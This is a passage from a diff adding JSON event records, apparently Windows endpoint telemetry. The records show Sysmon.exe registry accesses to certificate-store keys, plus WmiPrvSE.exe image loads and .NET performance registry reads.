+ "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiPerfClass.dll", + "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfClass.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wevtapi.dll", + "image_path": "C:\\Windows\\System32\\wevtapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573454170000, + "unique_pid": 
"{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": 
"C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "netfxperf.dll", + "image_path": "C:\\Windows\\System32\\netfxperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": 